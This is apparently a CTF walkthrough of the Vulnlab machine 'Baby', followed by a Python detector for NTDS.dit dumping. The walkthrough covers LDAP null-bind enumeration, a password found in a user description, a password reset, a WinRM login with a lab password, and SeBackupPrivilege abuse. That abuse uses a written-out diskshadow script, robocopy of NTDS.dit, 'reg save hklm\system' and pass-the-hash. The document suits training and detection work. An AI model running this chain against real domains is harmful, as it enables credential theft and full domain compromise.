Vulnlab — Baby

ARZ101
Jun 17, 2023


Baby from Vulnlab is an easy-rated Windows machine. It involves enumerating LDAP to query users and find a password; once the right set of credentials is identified, the account requires a password change, after which you can log in through WinRM. That user holds SeBackupPrivilege, which allows taking a backup of the drive, copying NTDS.dit and saving the SYSTEM hive locally on the machine to dump hashes.

NMAP

Nmap scan report for 10.10.83.40     
Host is up (0.081s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open tcpwrapped
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open tcpwrapped
593/tcp open tcpwrapped
3268/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-16T16:00:59
| Not valid after: 2023-12-16T16:00:59
| MD5: 55aa85b5f2fd316af5fbb1c8ad357d53
|_SHA-1: ae0ab02e5de2d54a9180931ff745d5a00deb41a2
|_ssl-date: 2023-06-17T16:09:48+00:00; +24s from scanner time.
5985/tcp open tcpwrapped
49664/tcp open tcpwrapped
60083/tcp open tcpwrapped
65331/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 445 (SMB)

Enumerating SMB shares as an anonymous user fails: unauthenticated access allows neither listing nor reading shares.

We can move on to LDAP, which is running on port 389.

PORT 389 (LDAP)

Querying LDAP with a null bind:

ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl"

This returns directory objects, including usernames.

We can use grep and awk to filter out just the usernames:

ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' |  awk '{ gsub(/ /,""); print }'

With kerbrute we can verify which of these are valid domain users; it also attempts AS-REP roasting, but here it did not find any domain user with pre-authentication disabled.

We can also grep for user descriptions; Teresa.Bell's description contained a password.

Using this password for Teresa failed, as it doesn't belong to her.

Spraying this password across the domain didn't work either.

Foothold (Connor.Wilkinson)

Going back to LDAP, there was a user, Caroline.Robinson, who had no attributes set and so was missed when the output was filtered on sAMAccountName.

For this user the password is valid, but it must be changed before it can be used.

We can change her password using impacket's smbpasswd, following this article:

smbpasswd -U Caroline.Robinson -r 10.10.83.40

We can try authenticating over WinRM to check whether this user is in the remote desktop group.

It shows the Pwn3d! status, which means we can log in through WinRM:

evil-winrm -i 10.10.83.40 -u 'Caroline.Robinson' -p 'BabyStart12345$Abc#!'

Checking the privileges of this account with whoami /all shows that it holds SeBackupPrivilege.

Caroline's password keeps getting reverted by a script running on the machine, so you'll need to change it again.

Privilege Escalation (Administrator)

Following this article, we can abuse SeBackupPrivilege by creating a diskshadow (.dsh) script that creates a shadow copy of the C: volume and exposes it as Z:; convert the script to DOS line endings with unix2dos before using it:

set context persistent nowriters
add volume c: alias owo
create
expose %owo% z:

Now, using robocopy, copy the NTDS.dit file from the exposed volume into the current directory.

Download the file to our Kali machine; after downloading, we'll have ntds.dit locally.

We'll also need the SYSTEM hive, saved from the registry:

reg save hklm\system C:\Windows\Temp\system

With both files, we can parse NTDS.dit to dump the hashes and obtain the administrator's hash.

Now, with pass-the-hash, we can log in as administrator.
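Seen from the defender's side, the chain above (a diskshadow script, a robocopy of NTDS.dit out of the shadow copy, and a reg save of the SYSTEM hive) is a useful correlation target. The following is an added example, not code from the original post, that runs that correlation over constructed Sysmon-style process-creation events; the event tuples, user names and the 30-minute window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of process-creation events (Sysmon Event ID 1 style);
# these are not real logs from the machine. Fields: timestamp, user, image, command line.
EVENTS = [
    ("2023-06-17T16:20:01", "BABY\\Caroline.Robinson", "C:\\Windows\\System32\\diskshadow.exe",
     "diskshadow.exe /s C:\\Windows\\Temp\\owo.dsh"),
    ("2023-06-17T16:20:40", "BABY\\Caroline.Robinson", "C:\\Windows\\System32\\Robocopy.exe",
     "robocopy /b Z:\\Windows\\NTDS . ntds.dit"),
    ("2023-06-17T16:21:05", "BABY\\Caroline.Robinson", "C:\\Windows\\System32\\reg.exe",
     "reg save hklm\\system C:\\Windows\\Temp\\system"),
    # A legitimate-looking backup job: backup mode, but no NTDS involvement.
    ("2023-06-17T09:00:00", "BABY\\backupsvc", "C:\\Windows\\System32\\Robocopy.exe",
     "robocopy /b D:\\Shares E:\\Backup /MIR"),
]

# Each stage of the chain: a name and a predicate over (image, command line).
STAGES = [
    ("shadow_copy", lambda img, cmd: img.lower().endswith("diskshadow.exe")),
    ("ntds_copy", lambda img, cmd: img.lower().endswith("robocopy.exe")
        and re.search(r"/b\b", cmd, re.I) and "ntds" in cmd.lower()),
    ("system_hive", lambda img, cmd: img.lower().endswith("reg.exe")
        and re.search(r"\bsave\b.*hklm\\system", cmd, re.I)),
]

def detect_ntds_dump(events, window=timedelta(minutes=30)):
    """Return {user: [stage names]} for users who hit at least two stages within the window."""
    hits = defaultdict(list)  # user -> [(timestamp, stage name)]
    for ts, user, image, cmd in events:
        for name, pred in STAGES:
            if pred(image, cmd):
                hits[user].append((datetime.fromisoformat(ts), name))
    alerts = {}
    for user, stages in hits.items():
        stages.sort()
        for i, (t0, _) in enumerate(stages):
            # Distinct stages observed from this event forward, within the window.
            seen = {n for t, n in stages[i:] if t - t0 <= window}
            if len(seen) >= 2:
                alerts[user] = sorted(seen)
                break
    return alerts

if __name__ == "__main__":
    for user, stages in detect_ntds_dump(EVENTS).items():
        print(f"ALERT: {user} performed {', '.join(stages)}")
```

Requiring two distinct stages within a window keeps a lone backup-mode robocopy from paging anyone, while the full three-stage sequence by one account fires immediately.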
